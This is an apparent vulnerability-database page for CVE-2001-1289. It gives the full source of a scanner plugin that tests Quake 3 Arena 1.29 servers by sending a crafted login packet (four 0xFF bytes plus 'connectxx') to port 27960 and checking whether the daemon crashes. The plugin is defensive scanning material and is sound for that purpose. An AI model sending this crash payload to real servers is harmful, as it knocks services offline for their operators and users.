| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2001-1289 | 3 May 200204:00 | – | cve | |
| CVE-2001-1289 | 3 May 200204:00 | – | cvelist | |
| id Software Quake 3 Arena Server 1.29 - Buffer Overflow | 29 Jul 200100:00 | – | exploitdb | |
| EUVD-2001-1270 | 7 Oct 202500:30 | – | euvd | |
| CVE-2001-1289 | 29 Jul 200104:00 | – | nvd | |
| Quake 3 Arena Malformed Connection Packet DoS | 29 Mar 200200:00 | – | nessus |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/3123 |
# SPDX-FileCopyrightText: 2001 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10931");
script_version("2023-07-21T05:05:22+0000");
script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3123");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_cve_id("CVE-2001-1289");
script_name("Quake3 Arena 1.29 f/g DOS");
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright("Copyright (C) 2001 Michel Arboi");
script_family("Denial of Service");
script_dependencies("find_service.nasl");
script_require_ports(27960);
script_tag(name:"solution", value:"Upgrade your software.");
script_tag(name:"summary", value:"It was possible to crash the Quake3 Arena daemon by sending a specially
crafted login string.");
script_tag(name:"impact", value:"A cracker may use this attack to make this service crash continuously,
preventing you from playing.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
port = 27960;
if( ! get_port_state( port ) )
exit( 0 );
soc = open_sock_tcp( port );
if( ! soc )
exit( 0 );
s = string( raw_string( 0xFF, 0xFF, 0xFF, 0xFF ), "connectxx" );
send( socket:soc, data:s );
close( soc );
soc = open_sock_tcp( port );
if( ! soc ) {
security_message( port:port );
exit( 0 );
}
close( soc );
exit( 99 );Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation